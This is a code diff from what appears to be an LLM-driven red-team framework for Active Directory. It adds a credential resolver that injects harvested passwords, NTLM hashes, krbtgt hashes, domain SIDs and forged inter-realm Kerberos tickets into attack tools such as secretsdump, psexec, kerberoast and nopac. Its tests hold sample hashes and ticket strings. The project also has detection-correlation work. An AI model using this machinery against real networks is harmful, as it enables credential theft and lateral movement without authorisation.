+        source_domain = %ticket.source_domain,
+        "credential_resolver: injecting inter-realm Kerberos ticket for cross-forest LDAP bind"
+    );
+    args.insert(
+        "ticket_path".to_string(),
+        Value::String(ticket.ticket_path.clone()),
+    );
+
+    // GSSAPI bind needs an FQDN to derive the `ldap/<fqdn>@<REALM>` SPN. If the
+    // LLM passed an IP for `target`, look up the host's hostname from state
+    // and rewrite. Without this, ldapsearch -Y GSSAPI errors with "no Kerberos
+    // service principal name found".
+    if let Some(ip_str) = string_field(args, "target") {
+        if ip_str.parse::<std::net::IpAddr>().is_ok() {
+            let hosts = reader.get_hosts(conn).await.unwrap_or_default();
+            let domain_l = target_domain.to_lowercase();
+            let host_match = hosts
+                .iter()
+                .find(|h| h.ip == ip_str && !h.hostname.is_empty());
+            if let Some(h) = host_match {
+                let hn = h.hostname.to_lowercase();
+                let fqdn = if hn.ends_with(&format!(".{domain_l}")) || hn == domain_l {
+                    hn
+                } else {
+                    format!("{hn}.{domain_l}")
+                };
+                info!(
+                    tool = %tool_name,
+                    old_target = %ip_str,
+                    new_target = %fqdn,
+                    "credential_resolver: rewrote target IP to FQDN for GSSAPI bind"
+                );
+                args.insert("target".to_string(), Value::String(fqdn));
+            } else {
+                warn!(
+                    tool = %tool_name,
+                    target_ip = %ip_str,
+                    target_domain = %target_domain,
+                    "credential_resolver: no FQDN found for target IP — GSSAPI bind may fail SPN lookup"
+                );
+            }
+        }
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use ares_core::models::{Credential, Hash};
+    use serde_json::json;
+
+    fn cred(user: &str, domain: &str, pass: &str) -> Credential {
+        Credential {
+            id: format!("c-{user}"),
+            username: user.to_string(),
+            password: pass.to_string(),
+            domain: domain.to_string(),
+            source: "test".into(),
+            discovered_at: None,
+            is_admin: false,
+            parent_id: None,
+            attack_step: 0,
+        }
+    }
+
+    fn hash(user: &str, domain: &str, value: &str, aes: Option<&str>) -> Hash {
+        Hash {
+            id: format!("h-{user}"),
+            username: user.to_string(),
+            hash_value: value.to_string(),
+            hash_type: "NTLM".into(),
+            domain: domain.to_string(),
+            cracked_password: None,
+            source: "test".into(),
+            discovered_at: None,
+            parent_id: None,
+            attack_step: 0,
+            aes_key: aes.map(String::from),
+        }
+    }
+
+    #[test]
+    fn placeholder_str_recognizes_brackets() {
+        assert!(is_placeholder_str("[TGT]"));
+        assert!(is_placeholder_str("[HASH]"));
+        assert!(is_placeholder_str("<password>"));
+        assert!(is_placeholder_str("<ntlm_hash>"));
+    }
+
+    #[test]
+    fn placeholder_str_recognizes_words() {
+        assert!(is_placeholder_str("N/A"));
+        assert!(is_placeholder_str("null"));
+        assert!(is_placeholder_str("None"));
+        assert!(is_placeholder_str("unknown"));
+        assert!(is_placeholder_str("password"));
+        assert!(is_placeholder_str("HASH"));
+        assert!(is_placeholder_str(" TGT "));
+    }
+
+    #[test]
+    fn placeholder_str_passes_real_values() {
+        assert!(!is_placeholder_str("aad3b435b51404eeaad3b435b51404ee"));
+        assert!(!is_placeholder_str("d350c5900e26d2c95f501e94cf95b078"));
+        assert!(!is_placeholder_str("P@ssw0rd!"));
+        assert!(!is_placeholder_str("/tmp/Administrator.ccache"));
+    }
+
+    #[test]
+    fn placeholder_str_empty_is_placeholder() {
+        assert!(is_placeholder_str(""));
+        assert!(is_placeholder_str(" "));
+    }
+
+    #[test]
+    
fn strip_placeholder_credentials_removes_bracketed() {
+        let mut args = json!({
+            "username": "admin",
+            "domain": "contoso.local",
+            "password": "[PWD]",
+            "hash": "<hash>"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        strip_placeholder_credentials(&mut args);
+        assert!(!args.contains_key("password"));
+        assert!(!args.contains_key("hash"));
+        assert_eq!(args.get("username").unwrap().as_str(), Some("admin"));
+    }
+
+    #[test]
+    fn strip_placeholder_credentials_keeps_real() {
+        let mut args = json!({
+            "password": "P@ssw0rd!",
+            "hash": "aad3b435b51404eeaad3b435b51404ee"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        strip_placeholder_credentials(&mut args);
+        assert!(args.contains_key("password"));
+        assert!(args.contains_key("hash"));
+    }
+
+    #[test]
+    fn find_credential_returns_match() {
+        let creds = vec![
+            cred("admin", "contoso.local", "P@ss1"),
+            cred("guest", "contoso.local", "guest1"),
+        ];
+        let found = find_credential(&creds, "admin", "contoso.local", false).unwrap();
+        assert_eq!(found.password, "P@ss1");
+    }
+
+    #[test]
+    fn find_credential_case_insensitive() {
+        let creds = vec![cred("Admin", "Contoso.Local", "P@ss1")];
+        let found = find_credential(&creds, "admin", "contoso.local", false).unwrap();
+        assert_eq!(found.password, "P@ss1");
+    }
+
+    #[test]
+    fn find_credential_cross_realm_fallback() {
+        // LLM passes target domain (fabrikam.local) for a tool acting as a
+        // user whose home realm is child.contoso.local. The resolver
+        // should still return the user's stored cred so the cross-realm
+        // auth attempt can proceed via Kerberos referral / NTLM pass-through.
+        let creds = vec![cred("alice", "child.contoso.local", "P@ss1")];
+        let found = find_credential(&creds, "alice", "fabrikam.local", false).unwrap();
+        assert_eq!(found.password, "P@ss1");
+        assert_eq!(found.domain, "child.contoso.local");
+    }
+
+    #[test]
+    fn find_credential_exact_match_preferred_over_other_realm() {
+        // When both an exact-domain match and a different-domain match exist
+        // for the same username, the exact match wins.
+        let creds = vec![
+            cred("admin", "fabrikam.local", "wrong"),
+            cred("admin", "contoso.local", "right"),
+        ];
+        let found = find_credential(&creds, "admin", "contoso.local", false).unwrap();
+        assert_eq!(found.password, "right");
+    }
+
+    #[test]
+    fn find_credential_empty_password_skipped() {
+        let creds = vec![cred("admin", "contoso.local", "")];
+        assert!(find_credential(&creds, "admin", "contoso.local", false).is_none());
+    }
+
+    #[test]
+    fn find_credential_realm_strict_blocks_cross_realm_fallback() {
+        // The resolver MUST NOT inject a child-realm cred when the tool
+        // (e.g. bloodyad_set_password against fabrikam.local DC) requires an
+        // exact-realm bind. Wrong-realm cred → 52e/775 at LDAP bind, which
+        // wastes the dispatch and burns the agent's tool budget.
+        let creds = vec![cred("bob", "child.contoso.local", "P@ss1")];
+        let found = find_credential(&creds, "bob", "fabrikam.local", true);
+        assert!(
+            found.is_none(),
+            "realm_strict must block cross-realm any_user fallback"
+        );
+    }
+
+    #[test]
+    fn find_credential_realm_strict_returns_exact_match() {
+        // Strict mode still returns an exact-realm match, even when other
+        // realms have the same username with different passwords.
+ let creds = vec![ + cred("admin", "fabrikam.local", "wrong"), + cred("admin", "contoso.local", "right"), + ]; + let found = find_credential(&creds, "admin", "contoso.local", true).unwrap(); + assert_eq!(found.password, "right"); + } + + #[test] + fn find_hash_realm_strict_blocks_cross_realm_fallback() { + let hashes = vec![hash( + "bob", + "child.contoso.local", + "deadbeef", + None, + )]; + let found = find_hash(&hashes, "bob", "fabrikam.local", true); + assert!( + found.is_none(), + "realm_strict must block cross-realm any_user fallback for hashes" + ); + } + + #[test] + fn find_hash_realm_strict_returns_exact_match() { + let hashes = vec![ + hash("admin", "fabrikam.local", "fabhash", None), + hash("admin", "contoso.local", "conhash", None), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", true).unwrap(); + assert_eq!(found.hash_value, "conhash"); + } + + #[test] + fn requires_exact_realm_covers_ldap_bind_tools() { + for tool in [ + "bloodyad_set_password", + "bloodyad_add_group_member", + "bloodyad_add_genericall", + "dacl_edit", + "pywhisker", + "ldap_search", + "ldap_search_descriptions", + "ldap_acl_enumeration", + "targeted_kerberoast", + "kerberoast", + "nopac", + "certifried", + "enumerate_domain_trusts", + ] { + assert!( + requires_exact_realm(tool), + "{tool} should require exact-realm bind" + ); + } + } + + #[test] + fn requires_exact_realm_excludes_trust_traversal_tools() { + // Tools that auth via Kerberos referral or NTLM pass-through MUST + // keep the cross-realm any_user fallback — they actually use the + // returned cred to traverse a trust. + for tool in [ + "smbclient", + "secretsdump", + "nxc_smb", + "psexec", + "wmiexec", + "smb_login_check", + ] { + assert!( + !requires_exact_realm(tool), + "{tool} should NOT require exact-realm bind (uses referral/pass-through)" + ); + } + } + + #[test] + fn find_hash_prefers_aes_record() { + let hashes = vec![ + hash("admin", "contoso.local", "abc1", None), + hash("admin", "contoso.local", "abc1", Some("aes-key-456")), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", false).unwrap(); + assert!(found.aes_key.is_some()); + } + + #[test] + fn find_hash_allows_empty_domain() { + // Older imports may not record domain on Hash records. + let hashes = vec![hash("admin", "", "abc1", None)]; + let found = find_hash(&hashes, "admin", "contoso.local", false); + assert!(found.is_some()); + } + + #[test] + fn find_hash_cross_realm_fallback() { + // Same intent as find_credential_cross_realm_fallback: the LLM passes + // the target domain but the only stored hash for the user is in their + // home realm. Return the home-realm hash rather than nothing. + let hashes = vec![hash( + "alice", + "child.contoso.local", + "deadbeef", + None, + )]; + let found = find_hash(&hashes, "alice", "fabrikam.local", false).unwrap(); + assert_eq!(found.hash_value, "deadbeef"); + assert_eq!(found.domain, "child.contoso.local"); + } + + #[test] + fn find_hash_exact_realm_wins_over_other_realm() { + let hashes = vec![ + hash("admin", "fabrikam.local", "fabhash", None), + hash("admin", "contoso.local", "conhash", None), + ]; + let found = find_hash(&hashes, "admin", "contoso.local", false).unwrap(); + assert_eq!(found.hash_value, "conhash"); + } + + #[test] + fn find_hash_skips_kerberoast_tgs() { + // Kerberoast TGS ciphertext must never be injected as `hash=…` — + // impacket bombs out with "Odd-length string" since it's not NTLM. 
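+        // (An authenticating NTLM value is a hex digest; `$krb5tgs$...` blobs
+        // are offline-cracking material only.)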
+        let mut tgs = hash(
+            "eve",
+            "child.local",
+            "$krb5tgs$23$*eve$CHILD.LOCAL$child.local/eve*$abc...",
+            None,
+        );
+        tgs.hash_type = "kerberoast".to_string();
+        let hashes = vec![tgs];
+        let found = find_hash(&hashes, "eve", "child.local", false);
+        assert!(
+            found.is_none(),
+            "kerberoast TGS must not be returned as authenticating hash"
+        );
+    }
+
+    #[test]
+    fn find_hash_keeps_ntlm_when_kerberoast_also_present() {
+        let mut tgs = hash("eve", "child.local", "$krb5tgs$23$*...", None);
+        tgs.hash_type = "kerberoast".to_string();
+        let ntlm = hash(
+            "eve",
+            "child.local",
+            "aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078",
+            None,
+        );
+        let hashes = vec![tgs, ntlm];
+        let found = find_hash(&hashes, "eve", "child.local", false).unwrap();
+        assert!(found.hash_value.starts_with("aad3"));
+    }
+
+    #[test]
+    fn resolve_principal_credentials_injects_password() {
+        let creds = vec![cred("admin", "contoso.local", "P@ss1")];
+        let hashes: Vec<Hash> = vec![];
+        let mut args = json!({"username": "admin", "domain": "contoso.local"})
+            .as_object()
+            .unwrap()
+            .clone();
+        resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false);
+        assert_eq!(args.get("password").unwrap().as_str(), Some("P@ss1"));
+    }
+
+    #[test]
+    fn resolve_principal_credentials_injects_hash_and_aes() {
+        let creds: Vec<Credential> = vec![];
+        let hashes = vec![hash("admin", "contoso.local", "abc1", Some("aes-256"))];
+        let mut args = json!({"username": "admin", "domain": "contoso.local"})
+            .as_object()
+            .unwrap()
+            .clone();
+        resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false);
+        assert_eq!(args.get("hash").unwrap().as_str(), Some("abc1"));
+        assert_eq!(args.get("aes_key").unwrap().as_str(), Some("aes-256"));
+        assert_eq!(args.get("nt_hash").unwrap().as_str(), Some("abc1"));
+    }
+
+    #[test]
+    fn resolve_principal_credentials_injects_nt_from_lm_nt_pair() {
+        let creds: Vec<Credential> = vec![];
+        let hashes = vec![hash(
+            "admin",
+            "contoso.local",
+            "aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078",
+            None,
+        )];
+        let mut args = json!({"username": "admin", "domain": "contoso.local"})
+            .as_object()
+            .unwrap()
+            .clone();
+        resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false);
+        assert_eq!(
+            args.get("nt_hash").unwrap().as_str(),
+            Some("d350c5900e26d2c95f501e94cf95b078")
+        );
+    }
+
+    #[test]
+    fn resolve_principal_credentials_does_not_overwrite_existing() {
+        let creds = vec![cred("admin", "contoso.local", "fromstate")];
+        let hashes: Vec<Hash> = vec![];
+        let mut args = json!({
+            "username": "admin",
+            "domain": "contoso.local",
+            "password": "passed-in"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_principal_credentials(&mut args, &creds, &hashes, "admin", "contoso.local", false);
+        assert_eq!(args.get("password").unwrap().as_str(), Some("passed-in"));
+    }
+
+    #[test]
+    fn resolve_coerce_principal_injects_password() {
+        let creds = vec![cred("svc-coerce", "contoso.local", "C0erceP@ss")];
+        let hashes: Vec<Hash> = vec![];
+        let mut args = json!({
+            "ca_host": "ca.contoso.local",
+            "coerce_target": "dc01.contoso.local",
+            "coerce_user": "svc-coerce",
+            "coerce_domain": "contoso.local"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_coerce_principal(&mut args, &creds, &hashes);
+        assert_eq!(
+            args.get("coerce_password").unwrap().as_str(),
+            Some("C0erceP@ss")
+        );
+        assert!(args.get("coerce_hash").is_none());
+    }
+
+    #[test]
+    fn resolve_coerce_principal_injects_hash() {
+        let creds: Vec<Credential> = vec![];
+        let hashes = vec![hash("svc-coerce", "contoso.local", "deadbeef", None)];
+        let mut args = json!({
+            "ca_host": "ca.contoso.local",
+            "coerce_target": "dc01.contoso.local",
+            "coerce_user": "svc-coerce",
+            "coerce_domain": "contoso.local"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_coerce_principal(&mut args, &creds, &hashes);
+        assert_eq!(args.get("coerce_hash").unwrap().as_str(), Some("deadbeef"));
+        assert!(args.get("coerce_password").is_none());
+    }
+
+    #[test]
+    fn resolve_coerce_principal_noop_without_user() {
+        let creds = vec![cred("svc-coerce", "contoso.local", "C0erceP@ss")];
+        let hashes = vec![hash("svc-coerce", "contoso.local", "deadbeef", None)];
+        let mut args = json!({
+            "ca_host": "ca.contoso.local",
+            "coerce_target": "dc01.contoso.local"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_coerce_principal(&mut args, &creds, &hashes);
+        assert!(args.get("coerce_password").is_none());
+        assert!(args.get("coerce_hash").is_none());
+    }
+
+    #[test]
+    fn resolve_coerce_principal_does_not_overwrite_existing() {
+        let creds = vec![cred("svc-coerce", "contoso.local", "fromstate")];
+        let hashes: Vec<Hash> = vec![];
+        let mut args = json!({
+            "coerce_user": "svc-coerce",
+            "coerce_domain": "contoso.local",
+            "coerce_password": "passed-in"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_coerce_principal(&mut args, &creds, &hashes);
+        assert_eq!(
+            args.get("coerce_password").unwrap().as_str(),
+            Some("passed-in")
+        );
+    }
+
+    #[test]
+    fn resolve_krbtgt_hashes_injects_for_domain() {
+        let hashes = vec![hash("krbtgt", "contoso.local", "kr1", None)];
+        let mut args = json!({"domain": "contoso.local"})
+            .as_object()
+            .unwrap()
+            .clone();
+        resolve_krbtgt_hashes(&mut args, &hashes);
+        assert_eq!(args.get("krbtgt_hash").unwrap().as_str(), Some("kr1"));
+    }
+
+    #[test]
+    fn resolve_krbtgt_hashes_injects_child() {
+        let hashes = vec![hash("krbtgt", "child.contoso.local", "kr-child", None)];
+        let mut args = json!({"child_domain": "child.contoso.local"})
+            .as_object()
+            .unwrap()
+            .clone();
+        resolve_krbtgt_hashes(&mut args, &hashes);
+        assert_eq!(
+            args.get("child_krbtgt_hash").unwrap().as_str(),
+            Some("kr-child")
+        );
+    }
+
+    #[test]
+    fn resolve_domain_sids_injects_all() {
+        let mut sids = std::collections::HashMap::new();
+        sids.insert("contoso.local".to_string(), "S-1-5-21-100".to_string());
+        sids.insert("fabrikam.local".to_string(), "S-1-5-21-200".to_string());
+
+        let mut args = json!({
+            "domain": "contoso.local",
+            "source_domain": "contoso.local",
+            "target_domain": "fabrikam.local"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_domain_sids(&mut args, &sids);
+        assert_eq!(
+            args.get("domain_sid").unwrap().as_str(),
+            Some("S-1-5-21-100")
+        );
+        assert_eq!(
+            args.get("source_sid").unwrap().as_str(),
+            Some("S-1-5-21-100")
+        );
+        assert_eq!(
+            args.get("target_sid").unwrap().as_str(),
+            Some("S-1-5-21-200")
+        );
+    }
+
+    #[test]
+    fn resolve_domain_sids_does_not_overwrite() {
+        let mut sids = std::collections::HashMap::new();
+        sids.insert("contoso.local".to_string(), "S-1-5-21-100".to_string());
+
+        let mut args = json!({
+            "domain": "contoso.local",
+            "domain_sid": "S-1-5-21-existing"
+        })
+        .as_object()
+        .unwrap()
+        .clone();
+        resolve_domain_sids(&mut args, &sids);
+        assert_eq!(
+            args.get("domain_sid").unwrap().as_str(),
+            Some("S-1-5-21-existing")
+        );
+    }
+
+    #[test]
+    fn nt_hash_only_strips_lm() {
+        assert_eq!(
+            nt_hash_only("aad3b435b51404eeaad3b435b51404ee:d350c5900e26d2c95f501e94cf95b078"),
+            "d350c5900e26d2c95f501e94cf95b078"
+        );
+    }
+
+    
#[test] + fn nt_hash_only_passes_through() { + assert_eq!( + nt_hash_only("d350c5900e26d2c95f501e94cf95b078"), + "d350c5900e26d2c95f501e94cf95b078" + ); + } + + #[test] + fn expects_ticket_kerberos_tools() { + let empty_args = json!({}).as_object().unwrap().clone(); + assert!(expects_ticket("psexec_kerberos", &empty_args)); + assert!(expects_ticket("wmiexec_kerberos", &empty_args)); + assert!(expects_ticket("secretsdump_kerberos", &empty_args)); + } + + #[test] + fn expects_ticket_skips_non_kerberos() { + let empty_args = json!({}).as_object().unwrap().clone(); + assert!(!expects_ticket("psexec", &empty_args)); + assert!(!expects_ticket("nmap_scan", &empty_args)); + } + + #[test] + fn expects_ticket_skips_when_already_set() { + let args_with_ticket = json!({"ticket_path": "/tmp/x.ccache"}) + .as_object() + .unwrap() + .clone(); + assert!(!expects_ticket("psexec_kerberos", &args_with_ticket)); + } + + // ── cross-forest Kerberos ticket injection ────────────────────────────── + + #[test] + fn resolve_cross_forest_ticket_not_injected_when_ntlm_exists() { + // When the hashes slice contains a matching NTLM hash for the target + // domain, is_authenticating_hash_type returns true and the function + // short-circuits — no Kerberos injection needed. + let hashes = [hash("admin", "fabrikam.local", "deadbeef00112233", None)]; + let domain_l = "fabrikam.local"; + // Replicate the guard logic from resolve_cross_forest_ticket + let user_l = "admin"; + let has_ntlm = hashes.iter().any(|h| { + h.domain.to_lowercase() == domain_l + && (user_l.is_empty() || h.username.to_lowercase() == user_l) + && !h.hash_value.is_empty() + && is_authenticating_hash_type(&h.hash_type) + }); + assert!( + has_ntlm, + "NTLM hash present — Kerberos injection should be skipped" + ); + } + + #[test] + fn resolve_cross_forest_ticket_triggered_when_no_ntlm_for_target() { + // When no NTLM hash for the target domain exists, the resolver should + // proceed to the Redis lookup for a forged ccache. + let hashes = [hash("administrator", "contoso.local", "deadbeef", None)]; + let domain_l = "fabrikam.local"; // foreign domain, no entry in hashes + let user_l = "administrator"; + let has_ntlm = hashes.iter().any(|h| { + h.domain.to_lowercase() == domain_l + && (user_l.is_empty() || h.username.to_lowercase() == user_l) + && !h.hash_value.is_empty() + && is_authenticating_hash_type(&h.hash_type) + }); + assert!( + !has_ntlm, + "No NTLM hash for fabrikam.local — resolver should attempt Kerberos ticket lookup" + ); + } + + #[test] + fn requires_exact_realm_bloodyad_set_password_is_true() { + // Confirm the canary tool is covered by realm_strict so that the + // cross-forest ticket injection fires for it. 
+ assert!(requires_exact_realm("bloodyad_set_password")); + } +} diff --git a/ares-cli/src/worker/mod.rs b/ares-cli/src/worker/mod.rs index bf798649..84e43a65 100644 --- a/ares-cli/src/worker/mod.rs +++ b/ares-cli/src/worker/mod.rs @@ -7,6 +7,7 @@ #[cfg(feature = "blue")] mod blue_task_loop; mod config; +pub mod credential_resolver; mod heartbeat; mod hosts; mod task_loop; diff --git a/ares-cli/src/worker/task_loop/result_handler.rs b/ares-cli/src/worker/task_loop/result_handler.rs index a185d89d..c703fd26 100644 --- a/ares-cli/src/worker/task_loop/result_handler.rs +++ b/ares-cli/src/worker/task_loop/result_handler.rs @@ -81,12 +81,12 @@ pub async fn process_task( if let Some(ref usage) = ar.usage { result_payload["usage"] = serde_json::to_value(usage).unwrap_or_default(); } - // Include structured discoveries parsed from tool output + // Include structured discoveries parsed from tool output. + // Must be nested under "discoveries" — the orchestrator's + // process_completed_task extracts from payload["discoveries"]. if let Some(ref disc) = ar.discoveries { - if let Some(obj) = disc.as_object() { - for (k, v) in obj { - result_payload[k] = v.clone(); - } + if disc.as_object().is_some_and(|o| !o.is_empty()) { + result_payload["discoveries"] = disc.clone(); } } ( diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs index 2dcbdf69..2f6b3b51 100644 --- a/ares-cli/src/worker/tool_executor.rs +++ b/ares-cli/src/worker/tool_executor.rs @@ -263,7 +263,29 @@ async fn execute_and_respond( let di = extract_target_info(&request.arguments); let dt = infer_target_type_from_info(&di); - let response = match ares_tools::dispatch(&request.tool_name, &request.arguments).await { + // Resolve credentials from operation state. The LLM never passes secret + // material — usernames + domains only. Anything that arrives looking like + // a placeholder is stripped, then the resolver fills in real values from + // harvested state by `(username, domain)`. + let mut resolved_arguments = request.arguments.clone(); + if let Err(e) = super::credential_resolver::resolve_credentials( + conn, + request.operation_id.as_deref(), + &request.tool_name, + &mut resolved_arguments, + ) + .await + { + warn!( + tool = %request.tool_name, + call_id = %request.call_id, + err = %e, + "credential_resolver failed; continuing with original arguments" + ); + resolved_arguments = request.arguments.clone(); + } + + let response = match ares_tools::dispatch(&request.tool_name, &resolved_arguments).await { Ok(output) => { // Raw output for structured parsers (need unfiltered data) let raw = output.combined_raw(); @@ -279,7 +301,7 @@ async fn execute_and_respond( let discoveries = ares_tools::parsers::parse_tool_output( &request.tool_name, &raw, - &request.arguments, + &resolved_arguments, ); let discoveries = if discoveries.as_object().is_none_or(|o| o.is_empty()) { None @@ -287,23 +309,53 @@ async fn execute_and_respond( Some(discoveries) }; - // Emit discovery spans for observability + // Emit discovery spans for observability. + // For "hosts" discoveries, emit one span per discovered host so each + // gets a clean destination.address (instead of the raw CIDR/multi-IP + // input target). Other discovery types use the extracted target info. 
if let Some(ref disc) = discoveries { if let Some(obj) = disc.as_object() { for (disc_type, items) in obj { - let count = items.as_array().map(|a| a.len()).unwrap_or(0); - if count > 0 { - let span = trace_discovery( - disc_type, - &request.tool_name, - di.target_user.as_deref(), - None, - di.target_ip.as_deref(), - di.target_fqdn.as_deref(), - dt, - request.operation_id.as_deref(), - ); - let _guard = span.enter(); + if disc_type == "hosts" { + // Per-host spans with individual IPs/hostnames + if let Some(hosts) = items.as_array() { + for host in hosts { + let host_ip = host.get("ip").and_then(|v| v.as_str()); + let host_fqdn = host + .get("hostname") + .and_then(|v| v.as_str()) + .filter(|h| !h.is_empty()); + let host_target_type = host_fqdn + .map(ares_core::telemetry::target::infer_target_type) + .or(dt); + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + host_ip, + host_fqdn, + host_target_type, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } + } + } else { + let count = items.as_array().map(|a| a.len()).unwrap_or(0); + if count > 0 { + let span = trace_discovery( + disc_type, + &request.tool_name, + di.target_user.as_deref(), + None, + di.target_ip.as_deref(), + di.target_fqdn.as_deref(), + dt, + request.operation_id.as_deref(), + ); + let _guard = span.enter(); + } } } } diff --git a/ares-core/src/correlation/redblue/tests.rs b/ares-core/src/correlation/redblue/tests.rs index 319e70dd..5f5c0264 100644 --- a/ares-core/src/correlation/redblue/tests.rs +++ b/ares-core/src/correlation/redblue/tests.rs @@ -769,6 +769,10 @@ fn new_custom_time_window() { assert_eq!(correlator.time_window.num_minutes(), 60); } +// ----------------------------------------------------------------------- +// recommend_detection — exhaustive per-technique checks +// ----------------------------------------------------------------------- + #[test] fn recommend_detection_t1046_mentions_scanning() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -817,6 +821,10 @@ fn recommend_detection_unknown_technique_returns_none() { assert!(RedBlueCorrelator::recommend_detection(&activity).is_none()); } +// ----------------------------------------------------------------------- +// determine_gap_reason — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn determine_gap_reason_empty_detections_list() { let activity = make_red_activity("T1046", "192.168.58.10", utc(12, 0)); @@ -838,6 +846,10 @@ fn determine_gap_reason_technique_matches_via_parent() { assert!(reason.contains("Alert exists but did not trigger")); } +// ----------------------------------------------------------------------- +// correlate — additional edge cases +// ----------------------------------------------------------------------- + #[test] fn correlate_false_positive_rate_zero_when_no_detections_in_window() { let correlator = RedBlueCorrelator::new("/tmp", Some(5)); diff --git a/ares-core/src/models/core.rs b/ares-core/src/models/core.rs index 342bea83..02485123 100644 --- a/ares-core/src/models/core.rs +++ b/ares-core/src/models/core.rs @@ -83,6 +83,17 @@ pub struct User { pub source: String, } +/// AD built-in accounts that ship `userAccountControl & ACCOUNTDISABLE` set +/// out of the box. Spraying or otherwise auth'ing against these can never +/// succeed and just burns the per-account badPwdCount budget — which on +/// shared lockout policies trips real accounts in the same window. 
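+///
+/// Illustrative call site (hypothetical; the real spray path may differ):
+/// `users.retain(|u| !is_always_disabled_account(&u.username))`.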
+pub fn is_always_disabled_account(username: &str) -> bool {
+    matches!(
+        username.to_lowercase().as_str(),
+        "guest" | "defaultaccount" | "wdagutilityaccount" | "krbtgt"
+    )
+}
+
 /// Discovered credential.
 ///
 /// Matches Python: `class Credential(Model)`
@@ -504,6 +515,91 @@ impl TrustInfo {
     }
 }
 
+/// Strength of evidence that a candidate string is a real AD domain.
+///
+/// Production AD discovery tools (BloodHound, NetExec, runZero) never trust a
+/// hostname suffix alone — they require positive AD evidence (DC self-report,
+/// authenticated bind, SRV record) before promoting a string to "authoritative
+/// domain." This enum lets us tag the source of each candidate so the promotion
+/// rules can stay consistent across discovery paths.
+#[derive(Debug, Clone, Copy, Serialize, Deserialize, PartialEq, Eq, Hash)]
+#[serde(rename_all = "snake_case")]
+pub enum DomainEvidence {
+    /// Configured in the operation target — authoritative starting point.
+    TargetConfig,
+    /// A DC self-reported the domain name (CLDAP NetLogon `DnsDomainName`,
+    /// Kerberos AS-REP `crealm`, anonymous LDAP RootDSE `defaultNamingContext`).
+    DcSelfReport,
+    /// Captured from authenticated AD enumeration — successful LDAP bind,
+    /// secretsdump, SMB session info from a verified auth.
+    AuthenticatedAd,
+    /// DNS SRV record `_ldap._tcp.dc._msdcs.<domain>` resolves.
+    DnsSrv,
+    /// Inferred from a host FQDN suffix (e.g. `srv01.contoso.local` →
+    /// `contoso.local`). Lowest tier — must be corroborated before promotion.
+    HostnameInference,
+}
+
+impl DomainEvidence {
+    /// Whether this evidence is sufficient to promote a candidate to
+    /// authoritative state without further corroboration.
+    pub fn is_authoritative(self) -> bool {
+        matches!(
+            self,
+            Self::TargetConfig | Self::DcSelfReport | Self::AuthenticatedAd | Self::DnsSrv
+        )
+    }
+}
+
+/// A domain name discovered during an operation, with provenance.
+///
+/// Held in `state.candidate_domains` until either (a) the evidence is
+/// authoritative on its own, (b) a probe (DNS SRV / CLDAP) corroborates it,
+/// or (c) it matches a domain already promoted via another path.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
+pub struct CandidateDomain {
+    /// Lowercase FQDN.
+    pub fqdn: String,
+    pub evidence: DomainEvidence,
+    /// IP of the host that produced this candidate (when applicable).
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub source_host_ip: Option<String>,
+    pub discovered_at: DateTime<Utc>,
+    /// Set once a probe has run. `confirmed = false` after probing means the
+    /// probe rejected it; we keep the record so we don't re-probe.
+    #[serde(default)]
+    pub probed: bool,
+    #[serde(default)]
+    pub confirmed: bool,
+    /// Timestamp of the most recent probe attempt. Used to retry transient
+    /// probe failures without hammering DNS every loop.
+    #[serde(default, skip_serializing_if = "Option::is_none")]
+    pub last_probed_at: Option<DateTime<Utc>>,
+    /// Count of transient probe attempts. Useful for visibility/backoff.
+    #[serde(default)]
+    pub probe_failures: u32,
+}
+
+impl CandidateDomain {
+    pub fn new(fqdn: impl Into<String>, evidence: DomainEvidence) -> Self {
+        Self {
+            fqdn: fqdn.into().to_lowercase(),
+            evidence,
+            source_host_ip: None,
+            discovered_at: Utc::now(),
+            probed: false,
+            confirmed: evidence.is_authoritative(),
+            last_probed_at: None,
+            probe_failures: 0,
+        }
+    }
+
+    pub fn with_source(mut self, ip: impl Into<String>) -> Self {
+        self.source_host_ip = Some(ip.into());
+        self
+    }
+}
+
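+// Sketch of the intended promotion check (illustrative only; the real
+// promotion path lives wherever candidates are drained). Here `promoted`
+// is a hypothetical set of FQDNs that already made it into `state.domains`:
+//
+//   fn should_promote(c: &CandidateDomain, promoted: &HashSet<String>) -> bool {
+//       c.evidence.is_authoritative()            // (a) authoritative alone
+//           || (c.probed && c.confirmed)         // (b) a probe corroborated it
+//           || promoted.contains(&c.fqdn)        // (c) promoted via another path
+//   }
+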
 /// Discovered SMB share.
 ///
 /// Matches Python: `class Share(Model)`
@@ -517,3 +613,35 @@ pub struct Share {
     #[serde(default, skip_serializing_if = "String::is_empty")]
     pub comment: String,
 }
+
+/// A forged Kerberos inter-realm ticket produced by `create_inter_realm_ticket`.
+///
+/// Stored in Redis (`ares:op:{id}:kerberos_tickets` HASH keyed by
+/// `{source_domain}:{target_domain}:{username}`) so downstream tools can pick
+/// up the ccache path when no NTLM bind works for the target forest.
+#[derive(Debug, Clone, Serialize, Deserialize, PartialEq)]
+pub struct KerberosTicket {
+    /// The domain whose krbtgt trust key was used to forge (source forest).
+    pub source_domain: String,
